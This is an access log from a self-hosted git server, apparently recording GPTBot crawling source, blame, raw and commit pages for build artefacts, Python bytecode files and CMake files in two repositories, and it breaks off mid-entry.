[Length 17364] [Gzip 3.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/2cf19183736a8e544b69d3e5f8992d77b105f429" -[17/Feb/2026:14:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10926] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:14:44:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10906] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:14:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10908] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:14:44:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10907] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:14:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10937] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:14:44:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:14:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:14:44:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 10162] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject" -[17/Feb/2026:14:44:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 11404] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject" -[17/Feb/2026:14:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 10274] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:14:44:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 10280] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:14:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9925] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" -[17/Feb/2026:14:44:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9904] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9907] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:44:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9906] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9935] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:44:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73569] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:44:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject" [Client 74.7.227.38] [Length 9911] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject" -[17/Feb/2026:14:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/.vscode" -[17/Feb/2026:14:44:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 172] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main.cpp" [Client 74.7.227.38] [Length 10469] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/main.cpp" -[17/Feb/2026:14:44:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build" [Client 74.7.227.38] [Length 11111] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject" -[17/Feb/2026:14:44:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 11673] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject" -[17/Feb/2026:14:44:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:14:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg" [Client 74.7.227.38] [Length 187] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/pyvenv.cfg" -[17/Feb/2026:14:44:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11057] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" -[17/Feb/2026:14:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:44:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14298] [Gzip 8.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:44:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10936] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:14:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10938] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:14:44:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 23974] [Gzip 15.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:44:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13350] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build" -[17/Feb/2026:14:44:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19490] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build" -[17/Feb/2026:14:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11406] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build" -[17/Feb/2026:14:44:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:44:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build" -[17/Feb/2026:14:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10771] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:44:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:14:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10906] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:14:44:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9933] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9934] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:44:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 24010] [Gzip 15.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:44:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13479] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:14:44:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:14:44:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:14:44:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14331] [Gzip 8.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 